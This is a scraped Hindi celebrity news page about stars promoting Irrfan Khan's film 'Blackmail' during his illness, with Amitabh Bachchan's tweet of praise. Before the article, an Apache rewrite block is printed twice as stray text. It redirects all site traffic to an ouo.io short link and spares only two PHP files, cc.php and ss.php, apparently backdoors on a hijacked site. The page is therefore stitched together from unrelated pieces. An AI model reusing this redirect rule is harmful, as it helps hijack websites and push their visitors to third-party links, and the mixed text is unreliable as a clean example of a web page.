
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 611
Previous Nextमुंबई। बीमार इरफान खान की फिल्म 'ब्लैकमेल' को प्रमोट करने के लिए सभी सितारे अपनी तरफ से कोशिश कर रहे हैं। हाल ही में अमिताभ बच्चन ने फिल्म का रिव्यू किया था। इसमें बिग बी ने फिल्म की काफी तारीफ की थी। अब खबर है कि आमिर, सलमान और शाहरुख खान मिलकर इस फिल्म को प्रमोट करने वाले हैं। मुंबई मिरर की रिपोर्ट की मानें तो ब्लैकमेल के मेकर्स ने तीनों खान्स के लिए एक स्पेशल स्क्रीनिंग रखी है। इसमें ये तीनों सितारे साथ फिल्म देखेंगे और इसके बाद फिल्म का प्रमोशन करते नजर आएंगे। क्योंकि इरफान ने अपनी बीमारी का पता चलने के बाद से काम से ब्रेक ले लिया था। फिलहाल वह यूके में अपना इलाज करवा रहे हैं। इरफान को न्यूरो-एंडोक्राइन ट्यूमर है। बीमारी का पता लगने के तुरंत बाद ही वह इलाज के लिए विदेश रवाना हो गए थे। इसी वजह से उनकी फिल्म का प्रमोशन अधर में लटका हुआ है। लेकिन इंडस्ट्री की तरफ से मिल रहे सपोर्ट की मदद से ये काम भी बखूबी निभाया जा रहा है। बिग बी ने तो ट्विटर के जरिए फिल्म की काफी तारीफ भी की थी। उन्होंने लिखा, “आज मजेदार फिल्म 'ब्लैकमेल' देखी। अद्भुत पटकथा, अद्वितीय कहानी, आदर्श प्रदर्शन, महान प्रस्तुति और संपादन। इरफान से लेकर कुछ नए चेहरों वाले अच्छे अभिनेता। ऐसी रचनात्मकता देखकर खुशी मिली।"